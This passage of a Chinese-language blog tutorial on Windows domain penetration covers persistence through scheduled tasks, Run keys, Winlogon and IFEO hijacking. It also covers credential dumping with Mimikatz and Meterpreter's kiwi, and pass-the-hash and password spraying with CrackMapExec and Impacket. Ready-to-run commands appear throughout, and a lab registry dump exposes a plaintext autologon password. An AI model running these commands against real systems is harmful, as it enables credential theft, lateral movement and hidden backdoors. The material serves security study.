<p>注意，此处传递的不是明文密码，因为明文相同，所以其 session hash 都是固定的（除非密码被修改并刷新缓存），则无需解密 hash 值，直接传递这个 hash 进行身份验证即可</p>
<p>在 Windows 中，pth 通过 NT Lan Manager(NTLM)，Kereros 和其他身份验证协议来进行单点登录。在 Windows 中创建密码后，密码经过哈希化处理后存储在安全账户管理器(SAM)，本地安全机构子系统(LSASS)进程内存，凭据管理器(CredMan)，Active Directory 中的 ntds.dit 数据库或者其他地方。因此，当用户登录 Windows 工作站或服务器时，他们实际上会留下密码凭据(hash)。</p>
<p>工具：mimikatz、impacket</p>
<hr>
<h1 id="权限维持"><a href="#权限维持" class="headerlink" title="权限维持"></a>权限维持</h1><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44268918/article/details/132338391">https://blog.csdn.net/weixin_44268918/article/details/132338391</a></p>
<h2 id="系统后门"><a href="#系统后门" class="headerlink" title="系统后门"></a>系统后门</h2><h3 id="计划任务"><a href="#计划任务" class="headerlink" title="计划任务"></a>计划任务</h3><pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">创建任务：Schtasks <span class="token operator">/</span>Create <span class="token operator">/</span>TN TestService <span class="token operator">/</span><span class="token function">SC</span> DAILY <span class="token operator">/</span>ST 09:46 <span class="token operator">/</span>TR c:\1\3000<span class="token punctuation">.</span>exe <span class="token operator">/</span>RL HIGHEST  
查看任务：SchTasks <span class="token operator">/</span>Query <span class="token operator">/</span>v <span class="token operator">/</span>fo list
删除任务：SchTasks <span class="token operator">/</span>Delete <span class="token operator">/</span>TN TestService <span class="token punctuation">[</span><span class="token operator">/</span>f<span class="token punctuation">]</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>如果以 SYSTEM 权限运行计划任务，就需要拥有管理员级别的权限，低权限用户看不到高权限用户的计划任务</p>
<h3 id="自启动相关的启动项-x2F-注册表键"><a href="#自启动相关的启动项-x2F-注册表键" class="headerlink" title="自启动相关的启动项&#x2F;注册表键"></a>自启动相关的启动项&#x2F;注册表键</h3><h4 id="系统启动文件夹"><a href="#系统启动文件夹" class="headerlink" title="系统启动文件夹"></a>系统启动文件夹</h4><p>将程序放置在启动文件夹中会导致该程序在用户登录时执行，位置一般如下</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\<span class="token function">Start</span> Menu\Programs\Startup
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\开始菜单\程序\启动
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\<span class="token function">Start</span>
<span class="token comment"># 指定用户范围启动</span>

C:\ProgramData\Microsoft\Windows\<span class="token function">Start</span> Menu\Programs\StartUp
<span class="token comment"># 系统范围启动</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="运行键"><a href="#运行键" class="headerlink" title="运行键"></a>运行键</h4><p>需要管理员级别的权限</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell"><span class="token comment"># 当前用户登录时启动</span>
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

<span class="token comment"># 所有用户登录时启动</span>
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">REG ADD <span class="token string">"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"</span> <span class="token operator">/</span>V <span class="token string">"backdoor"</span> <span class="token operator">/</span>t REG_SZ <span class="token operator">/</span>D <span class="token string">"C:\1\3000.exe"</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h4 id="Winlogon-Helper"><a href="#Winlogon-Helper" class="headerlink" title="Winlogon Helper"></a>Winlogon Helper</h4><p>Winlogon 是 Windows 系统的组件，用于处理与用户有关的各种行为，如登录、注销、在登录时加载用户配置文件、锁定屏幕等。一些键值定义了在 Windows 登录期间会启动哪些进程</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">reg query <span class="token string">"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"</span>

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ
    LegalNoticeText    REG_SZ
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    <span class="token punctuation">&#123;</span>A520A1A4-1780-4FF6-BD18-167343C5AF16<span class="token punctuation">&#125;</span>
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer<span class="token punctuation">.</span>exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost<span class="token punctuation">.</span>exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    Userinit    REG_SZ    C:\Windows\system32\userinit<span class="token punctuation">.</span>exe<span class="token punctuation">,</span>
    VMApplet    REG_SZ    SystemPropertiesPerformance<span class="token punctuation">.</span>exe <span class="token operator">/</span>pagefile
    WinStationsDisabled    REG_SZ    0
    ShellAppRuntime    REG_SZ    ShellAppRuntime<span class="token punctuation">.</span>exe
    scremoveoption    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    LastLogOffEndTimePerfCounter    REG_QWORD    0x27d2ca15cd
    ShutdownFlags    REG_DWORD    0x80000027
    AutoLogonSID    REG_SZ    S-1-5-21-3623938633-4064111800-2925858365-1180
    LastUsedUsername    REG_SZ    yuxuan
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    yuxuan
    DefaultPassword    REG_SZ    Yuxuan7QbrgZ3L
    DefaultDomainName    REG_SZ    xiaorang<span class="token punctuation">.</span>lab

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>




<hr>
<h2 id="事件触发执行"><a href="#事件触发执行" class="headerlink" title="事件触发执行"></a>事件触发执行</h2><h3 id="粘滞键"><a href="#粘滞键" class="headerlink" title="粘滞键"></a>粘滞键</h3><h3 id="映像劫持（IFEO-注入）"><a href="#映像劫持（IFEO-注入）" class="headerlink" title="映像劫持（IFEO 注入）"></a>映像劫持（IFEO 注入）</h3><p>映像劫持是利用 Windows 的 IFEO（Image File Execution Options）功能来实现的。IFEO 实际上是 Windows 的一项正常功能，主要用于调试程序，其初衷是在程序启动的时候开启调试器来调试程序，这样一来可以在调试器中观察程序在难以重现的环境中的行为。</p>
<p>简单来说就是，通过修改程序指定的注册表实现程序的劫持，当运行程序的时候实际上运行的是我们留的后门程序。</p>
<p>一个程序当要运行的时候，会去检查注册表，如果有指定的程序并且开启了 debugger，那么会优先执行 debugger 指定的程序，这样就会造成映像劫持。</p>
<p>使用 powershell 查看 IFEO 注册表</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell"><span class="token function">get-acl</span> <span class="token operator">-</span>path <span class="token string">"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>修改注册表，劫持记事本为计算器：</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">REG ADD <span class="token string">"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"</span> <span class="token operator">/</span>v Debugger <span class="token operator">/</span>d <span class="token string">"c:\windows\system32\calc.exe"</span> <span class="token operator">/</span>reg:32

REG DELETE <span class="token string">"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"</span> <span class="token operator">/</span>v Debugger <span class="token operator">/</span>d <span class="token string">"c:\windows\system32\calc.exe"</span> <span class="token operator">/</span>reg:32<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>隐藏劫持：配合 GlobalFlag 来实现，执行正常关闭后触发，也就是说当记事本执行后，木马是不会被执行的，同时记事本依旧是能够正常运行的，相当于无感操作，但是当关闭记事本的时候，就会自动触发执行后门木马</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">reg add <span class="token string">"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"</span> <span class="token operator">/</span>v GlobalFlag <span class="token operator">/</span>t REG_DWORD <span class="token operator">/</span>d 512
reg add <span class="token string">"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"</span> <span class="token operator">/</span>v ReportingMode <span class="token operator">/</span>t REG_DWORD <span class="token operator">/</span>d 1
reg add <span class="token string">"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"</span> <span class="token operator">/</span>v MonitorProcess <span class="token operator">/</span>d <span class="token string">"C:\1\3000.exe"</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<h3 id="屏保-amp-登录"><a href="#屏保-amp-登录" class="headerlink" title="屏保&amp;登录"></a>屏保&amp;登录</h3><hr>
<h2 id="域后门"><a href="#域后门" class="headerlink" title="域后门"></a>域后门</h2><h3 id="SID-History"><a href="#SID-History" class="headerlink" title="SID History"></a>SID History</h3><p>SID（Security Identifiers）是 Windows 系统中的安全标识符，是用户、用户组或其他安全主体的唯一、不可变标识符</p>
<p>如果将前一个账户删除，再用相同的名字创建另一个账户，那么新账户不会具有前一个账户的特权或访问权限，这是因为两个账户的 SID 不同</p>
<p>SID History 是一个支持域迁移方案的属性，使得一个账户的访问权限可以有效地克隆到另一个账户</p>
<hr>
<h2 id="DCSync"><a href="#DCSync" class="headerlink" title="DCSync"></a>DCSync</h2><hr>
<h1 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h1><h2 id="Mimikatz"><a href="#Mimikatz" class="headerlink" title="Mimikatz"></a>Mimikatz</h2><blockquote>
<p>Windows 密码提取工具，可收集凭证信息</p>
</blockquote>
<p>Windows 系统中用户登录后系统会将身份凭证存储于 <code>lsass.exe</code> 进程的内存当中，Mimikatz 通过注入 <code>lsass.exe</code> 进程读取进程内存，对 lsass 进行逆算，从中获取对应的明文密码。</p>
<blockquote>
<p>lsass 是微软 Windows 系统的安全机制，它主要用于本地安全和登陆策略，通常我们在<strong>登陆系统时输入密码之后</strong>，密码便会储存在 lsass 内存中，经过其 wdigest 和 tspkg 两个模块调用后，对其使用可逆的算法进行加密并存储在内存之中。</p>
</blockquote>
<p>在安装了 KB 2871997 补丁或者系统版本大于 windows server 2012 时，默认在内存缓存中禁止保存明文密码，但可以通过修改注册表的方式抓取明文，cmd 命令（执行后重启或用户重新登录就可以成功抓取）：</p>
<pre class="line-numbers language-cmd" data-language="cmd"><code class="language-cmd">reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest &#x2F;v UseLogonCredential &#x2F;t REG_DWORD &#x2F;d 1 &#x2F;f<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>


<p>Mimikatz 的启动需要 Administrator&#x2F;SYSTEM 权限运行，默认情况下拥有 32 位以及 64 位版本</p>
<p>修改运行权限：</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">privilege::debug
privilege:: <span class="token comment">#查看 privilege 的运行模块</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<h3 id="Sekurlsa-模块"><a href="#Sekurlsa-模块" class="headerlink" title="Sekurlsa 模块"></a>Sekurlsa 模块</h3><p>Sekurlsa 模块能从<code>lsass.exe</code>进程中提取 passwords、keys、pin、tickets 等用户凭据信息，是最常用到模块。</p>
<p>获取明文密码：</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">sekurlsa::logonpasswords<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/blog/2025/09/04/%E5%9F%9F%E5%AE%89%E5%85%A8%E5%9F%BA%E7%A1%80/IMG-20250911103810594.png"></p>
<p>查看用户哈希</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">lsadump::sam<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/blog/2025/09/04/%E5%9F%9F%E5%AE%89%E5%85%A8%E5%9F%BA%E7%A1%80/IMG-20250911111901778.png"></p>
<p>权限较低的话需要执行 <code>process::runp</code> 以系统权限运行</p>
<p>转储并导出 <code>lsass.exe</code> 进程</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">sekurlsa::minidump lsass<span class="token punctuation">.</span>tmp<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>通过哈希传递 pth 进行横向移动</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">sekurlsa::pth <span class="token operator">/</span>user:admin <span class="token operator">/</span>domain:host1 <span class="token operator">/</span>ntlm:b2781ba85ac750ec286744b009599637
sekurlsa::pth <span class="token operator">/</span>user:admin <span class="token operator">/</span>domain:host1 <span class="token operator">/</span>aes256:b2781ba85ac750ec286744b009599637<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>


<h3 id="kiwi"><a href="#kiwi" class="headerlink" title="kiwi"></a>kiwi</h3><p>是 msf 下的一个模块</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">meterpreter <span class="token operator">></span> <span class="token builtin class-name">help</span> kiwi <span class="token comment">#查看帮助</span>
Kiwi Commands
<span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span>
Command                Description
-------                -----------
creds_all              <span class="token comment">#列举所有凭据/所有的系统密码</span>
creds_kerberos         <span class="token comment">#列举所有kerberos凭据</span>
creds_msv              <span class="token comment">#列举所有msv凭据</span>
creds_ssp              <span class="token comment">#列举所有ssp凭据</span>
creds_tspkg            <span class="token comment">#列举所有tspkg凭据</span>
creds_wdigest          <span class="token comment">#列举所有wdigest凭据</span>
dcsync                 <span class="token comment">#通过DCSync检索用户帐户信息</span>
dcsync_ntlm            <span class="token comment">#通过DCSync检索用户帐户NTLM散列、SID和RID</span>
golden_ticket_create   <span class="token comment">#创建黄金票据</span>
kerberos_ticket_list   <span class="token comment">#列举kerberos票据</span>
kerberos_ticket_purge  <span class="token comment">#清除kerberos票据</span>
kerberos_ticket_use    <span class="token comment">#使用kerberos票据</span>
kiwi_cmd               <span class="token comment">#kiwi_cmd 模块可以让我们使用mimikatz的全部功能，该命令后面接 mimikatz.exe 的命令</span>
lsa_dump_sam           <span class="token comment">#dump出lsa的SAM</span>
lsa_dump_secrets       <span class="token comment">#dump出lsa的密文</span>
password_change        <span class="token comment">#修改密码</span>
wifi_list              <span class="token comment">#列出当前用户的wifi配置文件</span>
wifi_list_shared       <span class="token comment">#列出共享wifi配置文件/编码</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>





<hr>
<h2 id="CrackMapExec"><a href="#CrackMapExec" class="headerlink" title="CrackMapExec"></a>CrackMapExec</h2><p>内网域渗透，支持 ftp，smb，ssh，winrm，ldap，rdp，mssql 协议</p>
<h3 id="哈希传递实现-smb-连接"><a href="#哈希传递实现-smb-连接" class="headerlink" title="哈希传递实现 smb 连接"></a>哈希传递实现 smb 连接</h3><pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token parameter variable">-x</span> 通过cmd.exe执行命令
<span class="token parameter variable">-X</span> 通过cmd.exe调用执行powershell命令
crackmapexec smb <span class="token number">192.168</span>.216.144 <span class="token parameter variable">-u</span> <span class="token string">'administrator'</span> <span class="token parameter variable">-p</span> <span class="token string">'pass1234!'</span> <span class="token parameter variable">-x</span> <span class="token string">'whoami'</span>

或者使用 ntlm <span class="token builtin class-name">hash</span>
crackmapexec smb <span class="token number">192.168</span>.216.144 <span class="token parameter variable">-u</span> <span class="token string">'administrator'</span> <span class="token parameter variable">-H</span> <span class="token string">'aad3b435b51404eeaad3b435b51404ee:ff1a0a31d936bc8bf8b1ffc5b244b356'</span> <span class="token parameter variable">-x</span> <span class="token string">'whoami'</span>

默认情况下会自动选择登录域，-d可以指定域登录，-x要执行的命令
CME将按以下顺序执行命令
<span class="token number">1</span>.wmiexec：通过WMI执行命令
<span class="token number">2</span>.atexe：通过Windows任务调度程序调度任务来执行命令
<span class="token number">3</span>.smbexec：通过创建和运行服务来执行命令

<span class="token parameter variable">-X</span> <span class="token string">'$PSVersionTable'</span> 使用查看powershell版本环境命令 ，--amsi-bypass /path/payload 执行powershell<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<hr>
<h3 id="smb-密码喷洒"><a href="#smb-密码喷洒" class="headerlink" title="smb 密码喷洒"></a>smb 密码喷洒</h3><blockquote>
<p>密码喷洒攻击属于一种自动化攻击的方式，为了避免只针对一个用户进行密码爆破而造成账户锁定，密码喷洒攻击是对所有用户进行爆破，既避免了用户被锁定，同时也提高了用户破解密码的效率。同时，不同于固定用户名对密码进行爆破，密码喷洒攻击是固定密码对用户名进行爆破。</p>
</blockquote>
<p>已有密码字典的情况下，可以进行 smb 密码喷洒爆破出密码对应的域内用户</p>
<p>先拿到域内其中一台机器的 shell</p>
<pre class="line-numbers language-powershell" data-language="powershell"><code class="language-powershell">net user <span class="token operator">/</span>domain<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>整理成字典后便可以爆破</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">crackmapexec smb <span class="token number">10.10</span>.10.12 <span class="token parameter variable">-u</span> users.txt <span class="token parameter variable">-p</span> <span class="token string">'admin!@#45'</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<hr>
<h2 id="Impacket"><a href="#Impacket" class="headerlink" title="Impacket"></a>Impacket</h2><p><a target="_blank" rel="noopener" href="https://www.freebuf.com/sectool/175208.html">https://www.freebuf.com/sectool/175208.html</a></p>
<blockquote>
<p>Impacket 是一个 Python 类库，用于对 SMB1-3 或 IPv4 &#x2F; IPv6 上的 TCP、UDP、ICMP、IGMP，ARP，IPv4，IPv6，SMB，MSRPC，NTLM，Kerberos，WMI，LDAP 等协议进行低级编程访问。 </p>
</blockquote>
<h3 id="MacOS-下的问题"><a href="#MacOS-下的问题" class="headerlink" title="MacOS 下的问题"></a>MacOS 下的问题</h3><p>mac 下的环境问题，参考：<a target="_blank" rel="noopener" href="https://stackoverflow.com/questions/2438471/raw-socket-sendto-failure-in-os-x">https://stackoverflow.com/questions/2438471/raw-socket-sendto-failure-in-os-x</a></p>
<p>macos 上 ICMP 的 raw socket 不允许自定义 IP 头（即不能用 IP_HDRINCL），只能发送 ICMP 数据部分，IP 头由系统自动填充。</p>
<p>使用 ping.py 时会报错 <code>OSError: [Errno 22] Invalid argument</code></p>
<p>修复方法：只发送 ICMP 包，不发送 IP 包</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> select
<span class="token keyword">import</span> socket
<span class="token keyword">import</span> time
<span class="token keyword">import</span> sys

<span class="token keyword">from</span> impacket <span class="token keyword">import</span> ImpactDecoder<span class="token punctuation">,</span> ImpactPacket

<span class="token keyword">if</span> <span class="token builtin">len</span><span class="token punctuation">(</span>sys<span class="token punctuation">.</span>argv<span class="token punctuation">)</span> <span class="token operator">&lt;</span> <span class="token number">3</span><span class="token punctuation">:</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"Use: %s &lt;src ip> &lt;dst ip>"</span> <span class="token operator">%</span> sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
    sys<span class="token punctuation">.</span>exit<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>

src <span class="token operator">=</span> sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span>
dst <span class="token operator">=</span> sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span>

<span class="token comment"># Create a new IP packet and set its source and destination addresses.</span>

ip <span class="token operator">=</span> ImpactPacket<span class="token punctuation">.</span>IP<span class="token punctuation">(</span><span class="token punctuation">)</span>
ip<span class="token punctuation">.</span>set_ip_src<span class="token punctuation">(</span>src<span class="token punctuation">)</span>
ip<span class="token punctuation">.</span>set_ip_dst<span class="token punctuation">(</span>dst<span class="token punctuation">)</span>

<span class="token comment"># Create a new ICMP packet of type ECHO.</span>

icmp <span class="token operator">=</span> ImpactPacket<span class="token punctuation">.</span>ICMP<span class="token punctuation">(</span><span class="token punctuation">)</span>
icmp<span class="token punctuation">.</span>set_icmp_type<span class="token punctuation">(</span>icmp<span class="token punctuation">.</span>ICMP_ECHO<span class="token punctuation">)</span>

<span class="token comment"># Include a 156-character long payload inside the ICMP packet.</span>
icmp<span class="token punctuation">.</span>contains<span class="token punctuation">(</span>ImpactPacket<span class="token punctuation">.</span>Data<span class="token punctuation">(</span><span class="token string">b"A"</span><span class="token operator">*</span><span class="token number">156</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token comment"># Have the IP packet contain the ICMP packet (along with its payload).</span>
ip<span class="token punctuation">.</span>contains<span class="token punctuation">(</span>icmp<span class="token punctuation">)</span>

<span class="token comment"># Open a raw socket. Special permissions are usually required.</span>
s <span class="token operator">=</span> socket<span class="token punctuation">.</span>socket<span class="token punctuation">(</span>socket<span class="token punctuation">.</span>AF_INET<span class="token punctuation">,</span> socket<span class="token punctuation">.</span>SOCK_RAW<span class="token punctuation">,</span> socket<span class="token punctuation">.</span>IPPROTO_ICMP<span class="token punctuation">)</span>
<span class="token comment"># s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)</span>

seq_id <span class="token operator">=</span> <span class="token number">0</span>
<span class="token keyword">while</span> <span class="token number">1</span><span class="token punctuation">:</span>
    <span class="token comment"># Give the ICMP packet the next ID in the sequence.</span>
    seq_id <span class="token operator">+=</span> <span class="token number">1</span>
    icmp<span class="token punctuation">.</span>set_icmp_id<span class="token punctuation">(</span>seq_id<span class="token punctuation">)</span>

    <span class="token comment"># Calculate its checksum.</span>
    icmp<span class="token punctuation">.</span>set_icmp_cksum<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span>
    icmp<span class="token punctuation">.</span>auto_checksum <span class="token operator">=</span> <span class="token number">1</span>

    <span class="token comment"># Send it to the target host.</span>
    <span class="token comment"># s.sendto(ip.get_packet(), (dst, 0))</span>

    <span class="token comment"># 只发送ICMP包，不发送IP包</span>
    s<span class="token punctuation">.</span>sendto<span class="token punctuation">(</span>icmp<span class="token punctuation">.</span>get_packet<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token punctuation">(</span>dst<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

    <span class="token comment"># Wait for incoming replies.</span>
    <span class="token keyword">if</span> s <span class="token keyword">in</span> select<span class="token punctuation">.</span>select<span class="token punctuation">(</span><span class="token punctuation">[</span>s<span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">:</span>
        reply <span class="token operator">=</span> s<span class="token punctuation">.</span>recvfrom<span class="token punctuation">(</span><span class="token number">2000</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span>

        <span class="token comment"># Use ImpactDecoder to reconstruct the packet hierarchy.</span>
        rip <span class="token operator">=</span> ImpactDecoder<span class="token punctuation">.</span>IPDecoder<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>decode<span class="token punctuation">(</span>reply<span class="token punctuation">)</span>
        <span class="token comment"># Extract the ICMP packet from its container (the IP packet).</span>
        ricmp <span class="token operator">=</span> rip<span class="token punctuation">.</span>child<span class="token punctuation">(</span><span class="token punctuation">)</span>

        <span class="token comment"># If the packet matches, report it to the user.</span>
        <span class="token keyword">if</span> rip<span class="token punctuation">.</span>get_ip_dst<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">==</span> src <span class="token keyword">and</span> rip<span class="token punctuation">.</span>get_ip_src<span class="token punctuation">(</span>
        <span class="token punctuation">)</span> <span class="token operator">==</span> dst <span class="token keyword">and</span> icmp<span class="token punctuation">.</span>ICMP_ECHOREPLY <span class="token operator">==</span> ricmp<span class="token punctuation">.</span>get_icmp_type<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"Ping reply for sequence #%d"</span> <span class="token operator">%</span> ricmp<span class="token punctuation">.</span>get_icmp_id<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

        time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="/blog/2025/09/04/%E5%9F%9F%E5%AE%89%E5%85%A8%E5%9F%BA%E7%A1%80/IMG-20251009012800690.png"></p>
<h3 id="功能"><a href="#功能" class="headerlink" title="功能"></a>功能</h3><p>如果有下载源码的话，脚本都在 examples 目录下</p>
<ul>
<li>ping.py：ICMP Ping，使用 ICMP echo 和 echo-reply 数据包检查主机状态</li>
</ul>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">ping.py <span class="token operator">&lt;</span>src ip<span class="token operator">></span> <span class="token operator">&lt;</span>dst ip<span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<ul>
<li>lookupsid.py：通过 [MS-LSAT] MSRPC 接口的 Windows SID bruteforcer 示例，旨在查找远程用户&#x2F;组</li>
<li>psexec.py：在远程 Windows 系统上执行进程，复制文件，并返回处理输出结果。此外，它还允许你直接使用完整的交互式控制台执行远程 shell 命令（不需要安装任何客户端软件）</li>
<li>smbexec.py：与 psexec 相似，但是不会将二进制文件放入磁盘，smbexec 利用一个批处理文件和一个临时文件来执行和转发消息。与 psexec 一样，smbexec 通过 SMB 协议 (445&#x2F;TCP) 发送输入并接收输出。</li>
<li>rpcdump.py：转储在目标上注册的RPC端点和字符串bindings列表。它也会尝试将它们与一些知名的端点进行匹配</li>
<li>samrdump.py：与 MSRPC 套件中的安全帐户管理器远程接口通信的应用程序。它将为我们列出目标系统上的用户帐户，可用资源共享以及通过此服务导出的其他敏感信息</li>
<li>sniff.py：一个简单的数据包嗅探脚本。使用 pcapy 库来侦听通过指定接口传输的数据包</li>
